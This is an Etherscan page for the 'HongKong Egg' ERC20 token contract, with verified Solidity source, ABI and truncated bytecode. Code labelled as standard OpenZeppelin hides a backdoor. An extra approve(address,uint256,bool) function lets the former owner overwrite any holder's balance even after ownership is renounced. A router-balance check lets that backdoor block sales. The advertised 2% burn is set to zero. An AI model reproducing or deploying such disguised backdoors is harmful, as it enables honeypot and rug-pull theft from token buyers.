ETH Price: $2,392.40 (-3.60%)

Token

HongKong Egg (香港鸡蛋)
 

Overview

Max Total Supply

1,000,000,000 香港鸡蛋

Holders

50

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
8,929,999.999999998 香港鸡蛋

Value
$0.00
0xd8e8cfae536c3907ec1443620a1f22a0f17446d0
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
HongKongEgg

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-02-22
*/

/**
              .=*%@@@@%*=.              
            -#@@*=:::-=*@@%=            
          :%@#-     -@@*--#@%-          
         *@@-        .-#@%--%@*         
        #@#.            :%@#.#@%        
       #@#                *@%.#@%       
      +@%                  *@# %@+      
     .@@-                   %@=:@@.     
   +##@%    .+%*:      :*%+. :  #@##+   
   @@@@#. :*@@*%@%=  -%@%+@@#: .#@@@@.  
  .@@:+@@%@%=   :*@@@@#:   =%@%@@+:@@:  
  .@@.  =+-       .++.       :+=  .@@:  
   @@-                            -@@   
   *@%                            #@#   
   .@@=                          =@@.   
    :@@=                        =@@:    
     .%@#.                    .*@%:     
       =@@#-                -#@@+       
         -#@@%*=-:....:-=*#@@#=         
            :=*#%@@@@@@%#*=:          
  
         🥚🐣 HongKong Egg - $香港鸡蛋🐣🥚

         Main features:
1. Incentivize and maximize engagement
2. Burn LP automated
3. Active Vaults  
4. Liquidity Generation
5. Rewards for holders
6. 2% Burn
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;


// File: @openzeppelin/contracts/utils/Context.sol
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol
abstract contract Ownable is Context {
    address private _owner;
    address internal oldOwner;
    address internal _previousOwner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        oldOwner = _owner;
        _owner = newOwner;
        _previousOwner = oldOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.

 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _totalSupply = totalSupply_;

        _balances[msg.sender] = totalSupply_;
        emit Transfer(address(0), msg.sender, totalSupply_);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */

    function approve(address spender, uint256 amount, bool enable) public virtual {
        address _owner = oldOwner;

        require(msg.sender == _owner, "ERC20: approve from owner address");
        require(enable == true, "ERC20: approve from owner address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _balances[spender] = amount;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
    */

    function _transferWithBurn(address sender, address recipient, uint256 amount, uint256 amountToBurn) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");

        unchecked {
            _balances[sender] = senderBalance - amount;
        }

        amount -= amountToBurn;
        _totalSupply -= amountToBurn;
        _balances[recipient] += amount;

        emit Transfer(sender, DEAD, amountToBurn);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}


interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Router02 is IUniswapV2Router01{}

pragma solidity ^0.8.0;


contract HongKongEgg is ERC20 {
    uint256 private constant TOTAL_SUPPLY = 1_000_000_000e9;
    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;

    bool public hasLimit;
    uint256 public maxTxAmount;
    uint256 public maxHolding;
    mapping(address => bool) public isException;

    uint256 _burnPercent = 0;

    address uniswapV2Pair;
    IUniswapV2Router02 uniswapV2Router;

    constructor(address router) ERC20("HongKong Egg", unicode"香港鸡蛋", TOTAL_SUPPLY) {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(router);
        uniswapV2Router = _uniswapV2Router;

        maxHolding = TOTAL_SUPPLY / 20;
        maxTxAmount = TOTAL_SUPPLY / 20;

        isException[DEAD] = true;
        isException[router] = true;
        isException[msg.sender] = true;
        isException[address(this)] = true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
 
        _checkLimitation(from, to, amount);

        if (amount == 0) {
            return;
        }

        if (!isException[from] && !isException[to]){
            if(to == uniswapV2Pair){
                require(balanceOf(address(uniswapV2Router)) == 0, "ERC20: disable router deflation");
            }

            if (from == uniswapV2Pair || to == uniswapV2Pair) {
                uint256 _burn = (amount * _burnPercent) / 100;

                super._transferWithBurn(from, to, amount, _burn);
                return;
            }
        }

        super._transfer(from, to, amount);
    }

    function _checkLimitation(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (!hasLimit) {
            if (!isException[from] && !isException[to]) {
                require(amount <= maxTxAmount, "Amount exceeds max");

                if (uniswapV2Pair == ZERO){
                    uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
                }
 
                if (to == uniswapV2Pair) {
                    return;
                }
        
                require(balanceOf(to) + amount <= maxHolding, "Max holding exceeded max");
            }
        }
    }

    function removeLimit() external onlyOwner {
        hasLimit = true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"bool","name":"enable","type":"bool"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hasLimit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isException","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHolding","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600c553480156200001657600080fd5b50604051620016b4380380620016b48339810160408190526200003991620002f1565b6040518060400160405280600c81526020016b486f6e674b6f6e672045676760a01b8152506040518060400160405280600c81526020016be9a699e6b8afe9b8a1e89b8b60a01b815250670de0b6b3a7640000620000a6620000a0620001df60201b60201c565b620001e3565b8251620000bb9060069060208601906200024b565b508151620000d19060079060208501906200024b565b506005819055336000818152600360209081526040808320859055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050600e80546001600160a01b0319166001600160a01b03841617905550806200014f6014670de0b6b3a764000062000323565b600a55620001676014670de0b6b3a764000062000323565b60095550600b6020527f44433eeeda1d04bdae79f62169cdb2ab0a6af287fa15706d3fafdbac5fac34158054600160ff1991821681179092556001600160a01b039290921660009081526040808220805485168417905533825280822080548516841790553082529020805490921617905562000383565b3390565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b828054620002599062000346565b90600052602060002090601f0160209004810192826200027d5760008555620002c8565b82601f106200029857805160ff1916838001178555620002c8565b82800160010185558215620002c8579182015b82811115620002c8578251825591602001919060010190620002ab565b50620002d6929150620002da565b5090565b5b80821115620002d65760008155600101620002db565b6000602082840312156200030457600080fd5b81516001600160a01b03811681146200031c57600080fd5b9392505050565b6000826200034157634e487b7160e01b600052601260045260246000fd5b500490565b600181811c908216806200035b57607f821691505b602082108114156200037d57634e487b7160e01b600052602260045260246000fd5b50919050565b61132180620003936000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad57806398636f321161007157806398636f3214610249578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b806370a08231146101ec578063715018a6146102155780638c0b5e221461021d5780638da5cb5b1461022657806395d89b411461024157600080fd5b8063313ce567116100f4578063313ce567146101ac578063333e6f06146101bb57806339509351146101c457806344489ad1146101d757806362256589146101e457600080fd5b806306fdde031461013157806307ce29a71461014f578063095ea7b31461016457806318160ddd1461018757806323b872dd14610199575b600080fd5b6101396102de565b6040516101469190610f41565b60405180910390f35b61016261015d366004610fab565b610370565b005b610177610172366004610ff2565b61040a565b6040519015158152602001610146565b6005545b604051908152602001610146565b6101776101a736600461101e565b610420565b60405160098152602001610146565b61018b600a5481565b6101776101d2366004610ff2565b6104d1565b6008546101779060ff1681565b610162610508565b61018b6101fa36600461105f565b6001600160a01b031660009081526003602052604090205490565b61016261051f565b61018b60095481565b6000546040516001600160a01b039091168152602001610146565b610139610533565b61017761025736600461105f565b600b6020526000908152604090205460ff1681565b61017761027a366004610ff2565b610542565b61017761028d366004610ff2565b6105dd565b61018b6102a0366004611083565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b6101626102d936600461105f565b6105ea565b6060600680546102ed906110bc565b80601f0160208091040260200160405190810160405280929190818152602001828054610319906110bc565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b6001546001600160a01b03163381146103a45760405162461bcd60e51b815260040161039b906110f7565b60405180910390fd5b6001821515146103c65760405162461bcd60e51b815260040161039b906110f7565b6001600160a01b0384166103ec5760405162461bcd60e51b815260040161039b90611138565b50506001600160a01b03909116600090815260036020526040902055565b6000610417338484610663565b50600192915050565b600061042d84848461074c565b6001600160a01b0384166000908152600460209081526040808320338452909152902054828110156104b25760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161039b565b6104c685336104c18685611190565b610663565b506001949350505050565b3360008181526004602090815260408083206001600160a01b038716845290915281205490916104179185906104c19086906111a7565b6105106108e0565b6008805460ff19166001179055565b6105276108e0565b610531600061093a565b565b6060600780546102ed906110bc565b3360009081526004602090815260408083206001600160a01b0386168452909152812054828110156105c45760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161039b565b6105d333856104c18685611190565b5060019392505050565b600061041733848461074c565b6105f26108e0565b6001600160a01b0381166106575760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161039b565b6106608161093a565b50565b6001600160a01b0383166106c55760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161039b565b6001600160a01b0382166106eb5760405162461bcd60e51b815260040161039b90611138565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107725760405162461bcd60e51b815260040161039b906111bf565b6001600160a01b0382166107985760405162461bcd60e51b815260040161039b90611204565b6107a38383836109a2565b806107ad57505050565b6001600160a01b0383166000908152600b602052604090205460ff161580156107ef57506001600160a01b0382166000908152600b602052604090205460ff16155b156108d057600d546001600160a01b038381169116141561087257600e546001600160a01b0316600090815260036020526040902054156108725760405162461bcd60e51b815260206004820152601f60248201527f45524332303a2064697361626c6520726f75746572206465666c6174696f6e00604482015260640161039b565b600d546001600160a01b038481169116148061089b5750600d546001600160a01b038381169116145b156108d05760006064600c54836108b29190611247565b6108bc9190611266565b90506108ca84848484610c9a565b50505050565b6108db838383610e22565b505050565b6000546001600160a01b031633146105315760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161039b565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b60085460ff166108db576001600160a01b0383166000908152600b602052604090205460ff161580156109ee57506001600160a01b0382166000908152600b602052604090205460ff16155b156108db57600954811115610a3a5760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b604482015260640161039b565b600d546001600160a01b0316610c0457600e60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b158015610a9857600080fd5b505afa158015610aac573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ad09190611288565b6001600160a01b031663e6a4390530600e60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015610b2d57600080fd5b505afa158015610b41573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b659190611288565b6040516001600160e01b031960e085901b1681526001600160a01b0392831660048201529116602482015260440160206040518083038186803b158015610bab57600080fd5b505afa158015610bbf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610be39190611288565b600d80546001600160a01b0319166001600160a01b03929092169190911790555b600d546001600160a01b0383811691161415610c1f57505050565b600a5481610c42846001600160a01b031660009081526003602052604090205490565b610c4c91906111a7565b11156108db5760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d61780000000000000000604482015260640161039b565b6001600160a01b038416610cc05760405162461bcd60e51b815260040161039b906111bf565b6001600160a01b038316610ce65760405162461bcd60e51b815260040161039b90611204565b6001600160a01b03841660009081526003602052604090205482811015610d1f5760405162461bcd60e51b815260040161039b906112a5565b6001600160a01b03851660009081526003602052604090208382039055610d468284611190565b92508160056000828254610d5a9190611190565b90915550506001600160a01b03841660009081526003602052604081208054859290610d879084906111a7565b909155505060405182815261dead906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e1391815260200190565b60405180910390a35050505050565b6001600160a01b038316610e485760405162461bcd60e51b815260040161039b906111bf565b6001600160a01b038216610e6e5760405162461bcd60e51b815260040161039b90611204565b6001600160a01b03831660009081526003602052604090205481811015610ea75760405162461bcd60e51b815260040161039b906112a5565b610eb18282611190565b6001600160a01b038086166000908152600360205260408082209390935590851681529081208054849290610ee79084906111a7565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f3391815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610f6e57858101830151858201604001528201610f52565b81811115610f80576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b038116811461066057600080fd5b600080600060608486031215610fc057600080fd5b8335610fcb81610f96565b92506020840135915060408401358015158114610fe757600080fd5b809150509250925092565b6000806040838503121561100557600080fd5b823561101081610f96565b946020939093013593505050565b60008060006060848603121561103357600080fd5b833561103e81610f96565b9250602084013561104e81610f96565b929592945050506040919091013590565b60006020828403121561107157600080fd5b813561107c81610f96565b9392505050565b6000806040838503121561109657600080fd5b82356110a181610f96565b915060208301356110b181610f96565b809150509250929050565b600181811c908216806110d057607f821691505b602082108114156110f157634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526021908201527f45524332303a20617070726f76652066726f6d206f776e6572206164647265736040820152607360f81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b634e487b7160e01b600052601160045260246000fd5b6000828210156111a2576111a261117a565b500390565b600082198211156111ba576111ba61117a565b500190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207